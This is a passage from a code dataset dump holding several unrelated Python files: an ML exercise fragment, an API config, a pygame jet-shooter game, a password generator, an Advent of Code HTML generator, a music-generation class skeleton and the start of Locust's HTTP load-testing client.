np.exp(-y_2[i] * (wi[0] * X_2.values[i][0] + wi[1] * X_2.values[i][1]))))\n wj[0] = wi[0] + (k / total_rows) * summ_w1 - k * C * wi[0]\n wj[1] = wi[1] + (k / total_rows) * summ_w2 - k * C * wi[1]\n dst = distance.euclidean(wi, wj)\n else:\n break\n print('Iter = {}'.format(iter))\n for i in range(total_rows):\n a = 1 / (1 + np.exp(-wj[0] * X_2.values[i][0] - wj[1] * X_2.values[i][1]))\n y_predict_list.append(a)\n y_predict = np.array(y_predict_list)\n return y_predict\n\nroc_without_c = roc_auc_score(y, gradient_descent(X, y, C = 0.0))\nroc_with_c = roc_auc_score(y, gradient_descent(X, y, C = 10.0))\nprint(roc_without_c.round(3))\nprint(roc_with_c.round(3))\n\n\n\n\n\n\n\n\n","repo_name":"snowowwwl/Coursera_MLIntro_Yandex","sub_path":"W3_task3_logicregression/W3_task3_logicregression.py","file_name":"W3_task3_logicregression.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4692356181","text":"import os\nimport json\nfrom typing import Any, Union, List\n\nfrom pydantic import PostgresDsn, ValidationError, Field, validator, AnyHttpUrl\nfrom pydantic_settings import BaseSettings\n\nfrom src.constants import Environment\n\ncors_origin = os.environ.get(\"CORS_ORIGINS\", \"\").split(\",\")\nenv_name = os.environ.get(\"ENV_NAME\", \"PRODUCTION\")\n\nclass Config(BaseSettings):\n DATABASE_URL: PostgresDsn\n SITE_DOMAIN: str = \"myapp.com\"\n ENVIRONMENT: Environment = Environment[env_name]\n CORS_ORIGINS: Union[str, List[AnyHttpUrl]] = Field(..., env=\"CORS_ORIGINS\")\n CORS_HEADERS: list[str] = [\"*\"]\n APP_VERSION: str = \"1\"\n\n 
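# CORS_ORIGINS may arrive from the environment as a single comma-separated string; the validator below normalizes it into a list\n 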
@validator(\"CORS_ORIGINS\", pre=True)\n def _assemble_cors_origins(cls, cors_origins):\n if isinstance(cors_origins, str):\n return [item.strip() for item in cors_origins.split(\",\")]\n return cors_origins\n\n# database = PostgresDsn(\n# scheme=\"postgresql\",\n# username=os.environ.get(\"DB_NAME\"),\n# password=os.environ.get(\"PASSWORD\"),\n# host=os.environ.get(\"HOST\"),\n# # path=cls.db,\n# )\ntry:\n settings = Config(\n DATABASE_URL='postgres://os.environ.get(\"DB_NAME\"):os.environ.get(\"PASSWORD\")@os.environ.get(\"HOST\"):5432'\n )\nexcept ValidationError as e:\n print(e)\n\n\napp_configs: dict[str, Any] = {\"title\": \"Twinkle API\", \"debug\": True}\nif settings.ENVIRONMENT.is_deployed:\n app_configs[\"root_path\"] = f\"/v{settings.APP_VERSION}\"\n\nif not settings.ENVIRONMENT.is_debug:\n app_configs[\"openapi_url\"] = None # hide docs\n","repo_name":"gbolly/colander","sub_path":"backend/src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16658584555","text":" # IMPORTS\nimport pygame\nimport random\nimport json\nimport sys\n ## IMPORTS\n\n # GAME SCREEN SIZE\npygame.init()\nscreen_w=1920 #1366\nscreen_h=1080 #768\n ## GAME SCREEN SIZE\n \n # COLORS\nblack=(0, 0 ,0)\nwhite=(222, 222, 222)\nred=(180, 0, 0)\nblue=(0, 60, 255)\n ## COLORS\n \n # SET WINDOW TO FULLSCREEN, SET TITLE AND CLOCK VARIABLE\nscreen=pygame.display.set_mode([screen_w,screen_h],pygame.FULLSCREEN)\npygame.display.set_caption('Flight Fighter')\nclock=pygame.time.Clock()\n ## SET WINDOW TO FULLSCREEN, SET TITLE AND CLOCK VARIABLE\n \n # SET FONT SIZE\narial_25 = pygame.font.SysFont('arial',28)\n ## SET FONT SIZE\n \n # SET ENEMY/SNOW EVENT TIMERS\nENEMYSPAWN = pygame.USEREVENT + 1\npygame.time.set_timer(ENEMYSPAWN, 550)\n ## SET ENEMY/SNOW EVENT TIMERS\nSNOWSPAWN = pygame.USEREVENT + 2\npygame.time.set_timer(SNOWSPAWN, 500)\n \n # INNERGAME BACKGROUND VARIABLES\nbg1 = pygame.image.load('./images/bg1.png').convert_alpha()\nbg1 = pygame.transform.scale(bg1,(screen_w,screen_h))\nbg2 = pygame.image.load('./images/bg2.png').convert_alpha()\nbg2 = pygame.transform.scale(bg2,(screen_w,screen_h))\n ## INNERGAME BACKGROUND VARIABLES\n \n # LOCATION VARIABLES\nb1x = b1y = 0\nb2x , b2y = 0,-screen_h\n ## LOCATION VARIABLES\n \n # SPLASH SCREEN VARIABLES\nop1 = pygame.image.load('./images/intro.png').convert_alpha()\nop2 = pygame.image.load('./images/me.png').convert_alpha()\nop3 = pygame.image.load('./images/fighters.png').convert_alpha()\n ## SPLASH SCREEN VARIABLES\n \n # SOUND VARIABLES\nstart_sound = pygame.mixer.Sound('./audio/Black Ops 2 - Adrenaline.mp3')\nstart_sound.set_volume(.3)\ngameMusic = pygame.mixer.Sound('./audio/Black Ops 2 - Adrenaline.mp3')\ngameMusic.set_volume(.3)\ngameeasy = pygame.mixer.Sound('./audio/Counter Strike Main Menu.mp3')\ngameeasy.set_volume(.7)\ngamehard = pygame.mixer.Sound('./audio/Boss Fight.mp3')\ngamehard.set_volume(.7)\ngameover_music = pygame.mixer.Sound('./audio/Counter Strike Main Menu.mp3')\ngameover_music.set_volume(.3)\nhaha = pygame.mixer.Sound('./audio/haha.wav')\nhaha.set_volume(.5)\nexpl_sound = pygame.mixer.Sound('./audio/expl.wav')\nexpl_sound.set_volume(.3)\nimpact_sound = pygame.mixer.Sound('./audio/thud.wav')\nimpact_sound.set_volume(.4)\npowerup = pygame.mixer.Sound('./audio/powerup.wav')\ngunshot = pygame.mixer.Sound('./audio/gunshot.wav')\ngunshot.set_volume(.4)\nbomb = pygame.mixer.Sound('./audio/bomb.wav')\nshotgun = 
pygame.mixer.Sound('./audio/shotgun.wav')\nshotgun.set_volume(.3)\n ## SOUND VARIABLES\n \n # SETS GAME TRACK (TRACKS GO FROM 1-10)\ngtrack = pygame.mixer.Channel(5)\n # SETS PRIMARY INNERGAME STARTING MUSIC TO THE EASY-MODE TRACK\ngametrack = gameeasy\n \n # DEFAULT SOUND SETTINGS\nmuted = False\nmusic_change = True\n ## DEFAULT SOUND SETTINGS\n \n # SETS CLOUD VARIABLES\ncloud1=pygame.image.load('./images/cloud (1).png').convert_alpha()\ncloud2=pygame.image.load('./images/cloud (2).png').convert_alpha()\ncloud3=pygame.image.load('./images/cloud (3).png').convert_alpha()\ncloud4=pygame.image.load('./images/cloud (4).png').convert_alpha()\n ## SETS CLOUD VARIABLES\n \n # MORE LOCATION VARIABLES\nc1x,c1y = 0,-100\nc2x,c2y = 200,350\nc3x,c3y = 600,100\nc4x,c4y = 700,600\n ## MORE LOCATION VARIABLES\n \n # SETS PARTICLES TO SPRITE GROUPS\nall_snow = pygame.sprite.Group()\n\nall_sprites=pygame.sprite.Group()\n\nall_blocks=pygame.sprite.Group()\n\nall_bullets=pygame.sprite.Group()\n\nall_ebullets = pygame.sprite.Group()\n ## SETS PARTICLES TO SPRITE GROUPS\n\n ## HIGH SCORE\nHIGH_SCORE_FILE = \"high_score.json\"\n\ndef load_high_score():\n    try:\n        with open(HIGH_SCORE_FILE) as f:\n            return json.load(f)\n    except (OSError, ValueError):\n        return 0\n    \ndef save_high_score(score):\n    with open(HIGH_SCORE_FILE, \"w\") as f:\n        json.dump(score, f)\n ## HIGH SCORE\n \n # UPGRADE ANIMATION\nupgrade_anim = []\nfor i in range(1,10):\n    filename = './images/Picture{}.png'.format(i)\n    img = pygame.image.load(filename).convert()\n    img.set_colorkey(black)\n    img = pygame.transform.scale(img,(135,135))\n    upgrade_anim.append(img)\n\nclass Upgrade_anim(pygame.sprite.Sprite):\n    def __init__(self,center):\n        pygame.sprite.Sprite.__init__(self)\n        self.image = upgrade_anim[0]\n        self.rect = self.image.get_rect()\n        self.rect.center = center\n        self.frame = 0\n        self.last_update = pygame.time.get_ticks()\n        self.frame_rate = 50\n ## UPGRADE ANIMATION\n \n # UPGRADE SYNC ?\n    def update(self):\n        self.rect.center = player.rect.center\n        now = pygame.time.get_ticks()\n        if now - self.last_update > self.frame_rate:\n            self.last_update = now\n            self.frame +=1\n            if self.frame == len(upgrade_anim):\n                self.kill()\n            else:\n                center = self.rect.center\n                self.image = upgrade_anim[self.frame]\n                self.rect = self.image.get_rect()\n                self.rect.center = center\n ## UPGRADE SYNC ?\n \n # EXPLOSION ANIMATION SIZES\nexplosion_anim = {}\nexplosion_anim['lg'] = []\nexplosion_anim['sm'] = []\nexplosion_anim['Xlg'] = []\n ## EXPLOSION ANIMATION SIZES\n \n # EXPLOSION ANIM\nfor i in range(9):\n    filename = './images/regularExplosion0{}.png'.format(i)\n    img = pygame.image.load(filename).convert()\n    img.set_colorkey(black)\n    img_Xlg = pygame.transform.scale(img, (210,210))\n    explosion_anim['Xlg'].append(img_Xlg)\n    img_lg = pygame.transform.scale(img, (95, 95))\n    explosion_anim['lg'].append(img_lg)\n    img_sm = pygame.transform.scale(img, (32, 32))\n    explosion_anim['sm'].append(img_sm)\n ## EXPLOSION ANIM\n \n # EXPLOSION SIZE AND LOCATION\nclass Explosion(pygame.sprite.Sprite):\n    def __init__(self, center, size):\n        pygame.sprite.Sprite.__init__(self)\n        self.size = size\n        self.image = explosion_anim[self.size][0]\n        self.rect = self.image.get_rect()\n        self.rect.center = center\n        self.frame = 0\n        self.last_update = pygame.time.get_ticks()\n        self.frame_rate = 50\n ## EXPLOSION SIZE AND LOCATION\n \n # EXPLOSION SYNC ?\n    def update(self):\n        now = pygame.time.get_ticks()\n        if now - self.last_update > self.frame_rate:\n            self.last_update = now\n            self.frame += 1\n            if self.frame == 
len(explosion_anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosion_anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n ## EXPLOSION SYNC ?\n \n # SPRITE BLOCK STUFF \nclass Block(pygame.sprite.Sprite):\n def __init__(self,hp,speed):\n super().__init__()\n self.image = pygame.image.load('./images/e_jet.png').convert_alpha()\n self.rect=self.image.get_rect()\n self.radius = (self.rect.centerx - self.rect.x)\n self.hp= hp\n self.speed = speed\n self.birth = pygame.time.get_ticks()\n self.shoot = 1400\n\n # SPRITE BLOCKS SYNC\n def update(self):\n self.rect.move_ip(0,self.speed)\n if self.rect.top>screen_h:\n self.kill()\n if pygame.time.get_ticks() - self.birth > self.shoot:\n if not muted: shotgun.play()\n ebullet = Bullet(1,15,'ejet')\n ebullet.rect.centerx=self.rect.centerx\n ebullet.rect.centery=self.rect.centery\n all_ebullets.add(ebullet)\n all_sprites.add(ebullet)\n self.birth = pygame.time.get_ticks()\n\n # CLASS FOR SNOW IN MENU\nclass Snow(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.image = pygame.image.load('./images/snow.png').convert_alpha()\n self.rect = self.image.get_rect()\n self.speedy = random.randrange(1,5)\n self.speedx = random.randrange(-2,2)\n \n # SNOW SPRITE SYNC\n def update(self):\n self.rect.centery += self.speedy\n self.rect.centerx += self.speedx\n if self.rect.right>screen_w or self.rect.left<0 or self.rect.bottom>screen_h:\n self.kill()\n \n # PLAYER SPRITE CLASS\nclass Player(pygame.sprite.Sprite):\n def __init__(self,hp):\n super().__init__()\n self.image = pygame.image.load('./images/jet.png').convert_alpha()\n self.rect=self.image.get_rect()\n self.radius = (self.rect.centerx - self.rect.x)\n self.hp = hp\n self.speed = 8\n self.shoot_delay = 95\n self.last_shot = pygame.time.get_ticks()\n self.machinegun = False\n \n # PLAYER SPRITE SYNC\n def update(self):\n key = pygame.mouse.get_pressed()\n mouse_pos=pygame.mouse.get_pos()\n \n self.rect.centerx=mouse_pos[0]\n self.rect.centery=mouse_pos[1]\n\n # MACHINE GUN LMAO\n if self.machinegun:\n if key[0] == 1:\n if pygame.time.get_ticks() - self.last_shot > self.shoot_delay:\n if not muted:\n gunshot.play()\n self.last_shot = pygame.time.get_ticks()\n bullet=Bullet(-1,50,'jet')\n bullet.rect.centerx=player.rect.centerx\n bullet.rect.centery=player.rect.centery\n all_sprites.add(bullet)\n all_bullets.add(bullet) \n\n # BULLET SPRITE CLASS\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self,direction,speed,btype):\n super().__init__()\n self.type = btype\n if self.type == 'jet':\n if player.machinegun:\n self.image = pygame.image.load('./images/bullet2.png').convert_alpha()\n else:\n self.image=pygame.image.load('./images/bullet.png').convert_alpha()\n if self.type == 'ejet':\n self.image = pygame.image.load('./images/ebullet.png').convert_alpha()\n self.rect=self.image.get_rect()\n self.direction = direction\n self.speed = speed\n \n # BULLET SPRITE SYNC\n def update(self):\n self.rect.y+=(self.direction)*self.speed\n if self.rect.bottom<0:\n self.kill()\n if self.rect.top>screen_h:\n self.kill()\n\n # CLASS FOR IMAGES\nclass Image(pygame.sprite.Sprite):\n def __init__(self,image,center):\n super().__init__()\n self.image = image.convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.center = center\n\nplayer=Player(6)\nall_sprites.add(player)\nscore = 0\nblockspeed1 = 3\nblockspeed2 = 6\nbarHP = 3\nupgrade = 0\nincrement = 10\n\n # CLASS FOR BUTTON FUNCTIONALITY\ndef 
button(msg,x,y,w,h,ap,ic,ac,action = None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if x+w>mouse[0]>x and y+h>mouse[1]>y:\n pygame.draw.rect(screen,ac,(x-ap,y-ap,w+2*ap,h+2*ap))\n if click[0] == 1 and action != None:\n action()\n \n else:\n pygame.draw.rect(screen,ic,(x,y,w,h))\n txt = arial_25.render(msg,True,white)\n txt_rect = txt.get_rect()\n txt_rect.center = ((x+w/2),(y+h/2))\n screen.blit(txt,txt_rect)\n\n # MUTE/UNMUTE FUNCTION\ndef mute():\n global muted\n pygame.mixer.pause() # pause\n muted = True\ndef unmute():\n global muted\n pygame.mixer.unpause() # unpause\n muted = False\n\n # SPLASH SCREEN FUNCTION\ndef op():\n start = pygame.time.get_ticks()\n cinematic = True\n if not muted: start_sound.play(-1)\n while cinematic:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if pygame.time.get_ticks()-start<6500:\n screen.blit(op1,(0,0))\n elif 6500 score >= 10:\n block.image = pygame.image.load('./images/e_jet2.png').convert_alpha()\n block.rect = block.image.get_rect()\n block.radius = (block.rect.centerx - block.rect.x)\n block.hp = 5\n \n if 80 > score >= 40:\n expl_large = True\n block.image = pygame.image.load('./images/e_jet3.png').convert_alpha()\n block.rect = block.image.get_rect()\n block.radius = (block.rect.centerx - block.rect.x)-55\n block.hp = 10 \n block.speed = random.randint(3,6)\n pygame.time.set_timer(ENEMYSPAWN,1500)\n block.shoot = 800\n \n if score >= 80:\n if music_change:\n pygame.mixer.fadeout(1000)\n if not muted:\n haha.play()\n gametrack = gamehard\n gtrack.play(gametrack)\n music_change = False\n expl_large = True\n block.image = pygame.image.load('./images/e_jet4.png').convert_alpha()\n block.rect = block.image.get_rect()\n block.radius = (block.rect.centerx - block.rect.x)-55\n block.hp = 10 \n block.speed = random.randint(3,6)\n pygame.time.set_timer(ENEMYSPAWN,1500)\n block.shoot = 710\n\n block.rect.centerx = random.randrange(screen_w)\n block.rect.centery = random.randint(-140,-90)\n all_blocks.add(block)\n all_sprites.add(block)\n \n elif event.type==pygame.MOUSEBUTTONDOWN and event.button == 1 and not player.machinegun:\n if not muted: gunshot.play()\n bullet=Bullet(-1,50,'jet')\n bullet.rect.centerx=player.rect.centerx\n bullet.rect.centery=player.rect.centery\n all_sprites.add(bullet)\n all_bullets.add(bullet)\n\n all_sprites.update()\n \n # BULLET CONTACT HANDLING \n for bullet in all_bullets:\n block_hit_list=pygame.sprite.spritecollide(bullet,all_blocks,False,pygame.sprite.collide_circle)\n for block in block_hit_list:\n if not muted: impact_sound.play()\n expl = Explosion(bullet.rect.center,'sm')\n all_sprites.add(expl)\n block.hp -= 1\n bullet.kill()\n if block.hp<=0:\n pygame.sprite.spritecollide(bullet, all_blocks, True)\n if not muted: expl_sound.play()\n if expl_large:\n expl = Explosion(block.rect.center,'Xlg')\n else:\n expl = Explosion(block.rect.center,'lg')\n all_sprites.add(expl)\n bullet.kill()\n if expl_large: score +=2\n else: score+=1\n\n for ebullet in all_ebullets:\n ebullet_hit_list = pygame.sprite.spritecollide(player,all_ebullets,False,pygame.sprite.collide_circle)\n for ebullet in ebullet_hit_list:\n if not muted: impact_sound.play()\n expl = Explosion(player.rect.center,'sm')\n all_sprites.add(expl)\n player.hp -= 1\n ebullet.kill()\n if player.hp <= 0:\n if not muted: bomb.play()\n interval = 200\n expl = Explosion(player.rect.center,'lg')\n all_sprites.add(expl)\n timi = pygame.time.get_ticks()\n kill = True\n\n for bullet in 
all_bullets:\n bullet_ebullet_hits = pygame.sprite.spritecollide(bullet,all_ebullets,True)\n for bullet in bullet_ebullet_hits:\n expl = Explosion(bullet.rect.center,'sm')\n all_sprites.add(expl)\n bullet.kill()\n\n for blocks in all_blocks:\n jet_block_hit = pygame.sprite.spritecollide(player,all_blocks,True,pygame.sprite.collide_circle)\n for block in jet_block_hit:\n if not muted: expl_sound.play()\n if expl_large: expl = Explosion(block.rect.center,'Xlg')\n else: expl = Explosion(block.rect.center,'lg')\n all_sprites.add(expl)\n if expl_large:\n player.hp -= 2\n else:\n player.hp -= 1\n if player.hp <= 0:\n if not muted: bomb.play()\n interval = 200\n expl = Explosion(player.rect.center,'lg')\n all_sprites.add(expl)\n timi = pygame.time.get_ticks()\n kill = True\n \n\n # KILL FUNCTION\n if kill == True:\n \n if pygame.time.get_ticks() - timi > interval:\n expl = Explosion(player.rect.center,'lg')\n all_sprites.add(expl)\n interval += 200\n \n if pygame.time.get_ticks() - timi > 1000:\n kill = False\n player.kill()\n crash = True\n pygame.mouse.set_visible(1)\n gameover()\n\n screen.blit(bg1,(b1x,b1y))\n screen.blit(bg2,(b2x,b2y))\n\n b1y += 2\n b2y += 2\n \n if b1y > screen_h : b1y = -screen_h\n if b2y > screen_h : b2y = -screen_h\n\n screen.blit(cloud1,(c1x,c1y))\n screen.blit(cloud2,(c2x,c2y))\n screen.blit(cloud3,(c3x,c3y))\n screen.blit(cloud4,(c4x,c4y))\n\n c1x+=1\n c2x+=3\n c3x+=4\n c4x+=2\n\n if c1x>screen_w+10: c1x = -700 \n if c2x>screen_w+10: c2x = -700\n if c3x>screen_w+10: c3x = -700\n if c4x>screen_w+10: c4x = -700\n \n \n all_snow.draw(screen) \n all_sprites.draw(screen)\n\n\n # HP BAR \n if g_start:\n if not barHP>=player.hp*67:\n barHP += 7\n else:\n g_start = False\n else:\n if not barHP<=player.hp*67:\n barHP -= 5\n if not barHP>player.hp*67:\n barHP += 5\n if player.hp<=2:\n hp_color = red\n if barHP<=3:\n barHP = 3\n pygame.draw.rect(screen,hp_color,(10,10,barHP,10))\n hp_surf = arial_25.render('Health',True,white)\n screen.blit(hp_surf,(10,25))\n\n # SCORE INGAME\n s_surf = arial_25.render(\"Score: \"+str(score),True,white)\n screen.blit(s_surf,(10,60))\n s_surf = arial_25.render(\"High Score: \"+str(high_score),True,white)\n screen.blit(s_surf,(10,95))\n\n if score > high_score:\n high_score = score\n save_high_score(high_score)\n\n if up:\n if smg_not:\n upg_images.add(smg)\n if pygame.time.get_ticks()-timer < 2420:\n hp_color = (191,191,191)\n upg_images.draw(screen)\n else:\n hp_color = blue\n up = False\n smg_not = False\n upg_images.remove(smg)\n \n clock.tick(60)\n pygame.display.update()\n pygame.mouse.set_visible(1)\nop()\nmenu()\n\npygame.quit()\n","repo_name":"Svxy/Flight-Fighters","sub_path":"fighters.py","file_name":"fighters.py","file_ext":"py","file_size_in_byte":30964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"31201536938","text":"#!/usr/bin/python3\n\nfrom string import ascii_lowercase,ascii_uppercase\nfrom random import shuffle,choices\nfrom os import system\n\nsystem(\"clear\"),print(\"\"\"##### Simple and Powerful Password Generator #####\n\t ## By: Abd Almoen Arafa ##\n\t ## Age: 15 \t ##\\n\"\"\")\n\ndef content():\n\tl_l,l_u,nums,syms=ascii_lowercase,ascii_uppercase,\"0123456789\",\"!@#$%^&*()_+-=[]{};:'|\\/,.<>?\"\n\tlist=[l_l,l_u,nums,syms]\n\tshuffle(list)\n\tall=list[0]+list[1]+list[2]+list[3]\n\ttry:\n\t\task=int(input(\"How many elements: 
\"))\n\t\tprint(\"\\n\",\"\\t\"*3,\"#\"*31,\"\\n\")\n\t\tran=choices(all,k=ask)\n\t\tList=\"\".join(ran)\n\t\tprint(List),print(\"\\n\",\"\\t\"*3,\"#\"*31,\"\\n\")\n\texcept ValueError:\tprint(\"Sorry,You have to write just a numbers here\\n\"),content()\n\texcept KeyboardInterrupt:\tprint(\"\\nBye ;)\\n\")\n\ncontent()\n#By Abd Almoen Arafa\n#I'm 15 years old\n","repo_name":"0Arafa/0.1ArafaPassGen","sub_path":"0.1ArafaPassGen.py","file_name":"0.1ArafaPassGen.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15018096036","text":"import torch\nimport torchaudio\nfrom transformers import AutoModel\nimport torchaudio.transforms as T\nimport numpy as np\nimport pandas as pd\n\nclass MusicGenerator:\n def __init__(self, mert_model_path, eeg_model_path, music_gen_model_path, feature_extractor, resample_rate):\n self.mert_model = AutoModel.from_pretrained(mert_model_path, trust_remote_code=True)\n self.eeg_model = AutoModel.from_pretrained(eeg_model_path, trust_remote_code=True)\n self.music_gen_model = AutoModel.from_pretrained(music_gen_model_path, trust_remote_code=True)\n self.feature_extractor = feature_extractor\n self.resample_rate = resample_rate\n self.aggregator = torch.nn.Conv1d(in_channels=13, out_channels=1, kernel_size=1)\n self.data_sheet = pd.DataFrame()\n\n def preprocess_audio(self, audio_path):\n waveform, sampling_rate = torchaudio.load(audio_path)\n if sampling_rate != self.resample_rate:\n resampler = T.Resample(sampling_rate, self.resample_rate)\n waveform = resampler(waveform)\n return waveform\n\n def analyze_music(self, audio_waveform):\n inputs = self.feature_extractor(audio_waveform, sampling_rate=self.resample_rate, return_tensors=\"pt\")\n with torch.no_grad():\n outputs = self.mert_model(**inputs, output_hidden_states=True)\n return outputs\n\n def extract_features(self, audio_waveform, eeg_data):\n # Analyze music\n music_outputs = self.analyze_music(audio_waveform)\n\n # EEG Model predictions\n eeg_outputs = self.eeg_model(eeg_data) # Implement EEG model prediction\n\n # Combine features\n combined_features = self.combine_features(music_outputs, eeg_outputs)\n return combined_features\n\n def combine_features(self, music_outputs, eeg_outputs):\n # Extract relevant information from music outputs\n music_features = music_outputs.last_hidden_state.mean(dim=1) # Example aggregation\n\n # EEG outputs processing\n eeg_features = eeg_outputs.last_hidden_state.mean(dim=1) # Example aggregation\n\n # Combine features with appropriate weighting and normalization\n combined_features = torch.cat((music_features, eeg_features), dim=1)\n combined_features = self.normalize_features(combined_features)\n\n return combined_features\n\n def normalize_features(self, features):\n # Normalize features for consistency\n return (features - features.mean(dim=0)) / (features.std(dim=0) + 1e-5)\n\n def generate_music(self, combined_features):\n # Transform features for music generation model input\n input_for_generation = self.prepare_input_for_generation(combined_features)\n\n # Generate music using the model\n with torch.no_grad():\n generated_music = self.music_gen_model.generate(input_for_generation)\n\n return generated_music\n\n def prepare_input_for_generation(self, combined_features):\n # Prepare and transform the combined features for the music generation model\n # This may involve specific transformations based on the model's requirements\n return combined_features # 
Placeholder\n\n    def continuous_learning_cycle(self, audio_path, eeg_data):\n        # Preprocess audio\n        audio_waveform = self.preprocess_audio(audio_path)\n\n        # Feature extraction\n        combined_features = self.extract_features(audio_waveform, eeg_data)\n\n        # Generate music\n        generated_music = self.generate_music(combined_features)\n\n        # Update data sheet\n        self.update_data_sheet(combined_features)\n\n        return generated_music\n\n    def update_data_sheet(self, features):\n        # Update the data sheet with new features for continuous learning\n        # (pd.concat is used because DataFrame.append was removed in pandas 2.x)\n        self.data_sheet = pd.concat([self.data_sheet, pd.DataFrame([features])], ignore_index=True)\n\n# Example usage\nfeature_extractor = None # Define or load your feature extractor\neeg_data = None # Placeholder: supply real EEG input here\nmusic_gen = MusicGenerator(\"path_to_mert_model\", \"path_to_eeg_model\", \"path_to_music_gen_model\", feature_extractor, 24000)\ngenerated_music = music_gen.continuous_learning_cycle(\"path_to_audio.wav\", eeg_data)","repo_name":"HawkSP/DedAI","sub_path":"Music_Recommendation_and_Generation/music_generator.py","file_name":"music_generator.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39105173884","text":"import sys\nimport os\nsys.setrecursionlimit(2500)\n\nfilename = 'input'\n\nwith open(filename, 'r') as f:\n    content = [x.strip() for x in f.readlines()]\n\ncommands = [(x.split(' ')[0], int(x.split(' ')[1])) for x in content]\n\nthe_divs = {\n    'forward': [],\n    'up': [],\n    'down': []\n}\nfor command, distance in commands:\n    the_divs[command].append(f'
    ')\n\nwith open('index-template.html', 'r') as f:\n content = f.read()\n\nkeys = the_divs.keys()\nfor key in keys:\n inner_divs = '\\n'.join(the_divs[key])\n full_div = f'
    {inner_divs}
    '\n the_divs[key] = full_div\n\ndive_div = the_divs['forward'] + '\\n' + the_divs['down']\nsurface_div = the_divs['forward'] + '\\n' + the_divs['up']\nupdated_content = content.replace('[[DIVE-DATA]]', dive_div)\nupdated_content = updated_content.replace('[[SURFACE-DATA]]', surface_div)\n\nwith open('index.html', 'w') as f:\n f.write(updated_content)\n\ngenerated_css = []\n\nwith open('helper-vars.css', 'w') as f:\n for idx in range(0, 100):\n print('div[data-distance=\"{idx}\"] {{ --distance: {idx}px; --distance-as-string: \"{idx}\" }}'.format(idx=idx), file=f)\n","repo_name":"CatEars/advent-of-code-but-with-html-css-and-svg","sub_path":"2/html-css/generate-data.py","file_name":"generate-data.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11822819822","text":"from __future__ import absolute_import\n\nimport chardet\nimport re\nimport six\nimport socket\nfrom base64 import b64encode\nfrom six.moves.urllib.parse import urlparse, urlunparse\nfrom ssl import SSLError\nfrom timeit import default_timer\n\nif six.PY2:\n from cookielib import CookieJar\n class ConnectionRefusedError(Exception):\n # ConnectionRefusedError doesn't exist in python 2, so we'll \n # define a dummy class to avoid a NameError\n pass\nelse:\n from http.cookiejar import CookieJar\n unicode = str\n\nfrom gevent.timeout import Timeout\nfrom geventhttpclient.useragent import UserAgent, CompatRequest, CompatResponse, ConnectionError\nfrom geventhttpclient.response import HTTPConnectionClosed\n\nfrom locust import events\nfrom locust.core import Locust\nfrom locust.exception import LocustError, CatchResponseError, ResponseError\n\n\n# Monkey patch geventhttpclient.useragent.CompatRequest so that Cookiejar works with Python >= 3.3\n# More info: https://github.com/requests/requests/pull/871\nCompatRequest.unverifiable = False\n\n# Regexp for checking if an absolute URL was specified\nabsolute_http_url_regexp = re.compile(r\"^https?://\", re.I)\n\n# List of exceptions that can be raised by geventhttpclient when sending an HTTP request, \n# and that should result in a Locust failure\nFAILURE_EXCEPTIONS = (ConnectionError, ConnectionRefusedError, socket.error, \\\n SSLError, Timeout, HTTPConnectionClosed)\n\n\ndef _construct_basic_auth_str(username, password):\n \"\"\"Construct Authorization header value to be used in HTTP Basic Auth\"\"\"\n if isinstance(username, str):\n username = username.encode('latin1')\n if isinstance(password, str):\n password = password.encode('latin1')\n return 'Basic ' + b64encode(b':'.join((username, password))).strip().decode(\"ascii\")\n\n\nclass FastHttpLocust(Locust):\n \"\"\"\n Represents an HTTP \"user\" which is to be hatched and attack the system that is to be load tested.\n \n The behaviour of this user is defined by the task_set attribute, which should point to a \n :py:class:`TaskSet ` class.\n \n This class creates a *client* attribute on instantiation which is an HTTP client with support \n for keeping a user session between requests.\n \"\"\"\n \n client = None\n \"\"\"\n Instance of HttpSession that is created upon instantiation of Locust. \n The client support cookies, and therefore keeps the session between HTTP requests.\n \"\"\"\n \n def __init__(self):\n super(FastHttpLocust, self).__init__()\n if self.host is None:\n raise LocustError(\"You must specify the base host. 
Either in the host attribute in the Locust class, or on the command line using the --host option.\")\n        if not re.match(r\"^https?://[^/]+$\", self.host, re.I):\n            raise LocustError(\"Invalid host (`%s`). The specified host string must be a base URL without a trailing slash. E.g. http://example.org\" % self.host)\n        \n        self.client = FastHttpSession(base_url=self.host)\n\n\nclass FastHttpSession(object):\n    auth_header = None\n    \n    def __init__(self, base_url, **kwargs):\n        self.base_url = base_url\n        self.cookiejar = CookieJar()\n        self.client = LocustUserAgent(max_retries=1, cookiejar=self.cookiejar, **kwargs)\n        \n        # Check for basic authentication\n        parsed_url = urlparse(self.base_url)\n        if parsed_url.username and parsed_url.password:\n            netloc = parsed_url.hostname\n            if parsed_url.port:\n                netloc += \":%d\" % parsed_url.port\n            \n            # remove username and password from the base_url\n            self.base_url = urlunparse((parsed_url.scheme, netloc, parsed_url.path, parsed_url.params, parsed_url.query, parsed_url.fragment))\n            # store authentication header (we construct this by using _basic_auth_str() function from requests.auth)\n            self.auth_header = _construct_basic_auth_str(parsed_url.username, parsed_url.password)\n    \n    def _build_url(self, path):\n        \"\"\" prepend url with hostname unless it's already an absolute URL \"\"\"\n        if absolute_http_url_regexp.match(path):\n            return path\n        else:\n            return \"%s%s\" % (self.base_url, path)\n    \n    def _send_request_safe_mode(self, method, url, **kwargs):\n        \"\"\"\n        Send an HTTP request, and catch any exception that might 